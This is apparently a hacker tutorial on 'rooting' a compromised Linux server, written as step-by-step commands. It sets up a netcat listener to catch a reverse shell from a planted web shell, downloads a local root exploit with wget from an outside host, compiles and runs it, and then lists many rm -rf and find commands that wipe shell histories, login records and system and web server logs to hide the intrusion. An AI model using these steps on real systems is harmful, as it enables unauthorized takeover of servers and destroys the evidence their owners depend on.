Hi guys today i will tell you how to root a server in few easy steps .
Things Required :
Step By Step Tutorial :
- First go to Run & type cmd then type : cd C:\Program Files\Netcat ( Make sure that you Netcat is saved in the following directory ) .

- Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .

- Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .

- So you have successfully connected .. Then now we have to get our Local Root Exploit, like mine is 2.6.18-374 2011 .

- In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder .
Type this command to change dir to /tmp : cd /tmp
- To upload your your exploit we will use wget function .
Type : wget http://www.somesite.com/exploit.c
Now this will upload the exploit in the tmp folder .

- (Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit
Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit.
(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .
Type: unzip exploit.zip
- After we have done all the above steps correctly, its time to give permission so we will type the following command
Type: chmod 777 exploit
- Now its time to run the Exploit, to run the exploit we will type the following command
Type: ./exploit
Now the exploit will run & the server will be rooted ;) . To check weather we got root we can type
Type: id or whoami
Clearing Logs:
Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
Hope you all guys have enjoyed this Tutorial
Server Rooting
Web Hacking
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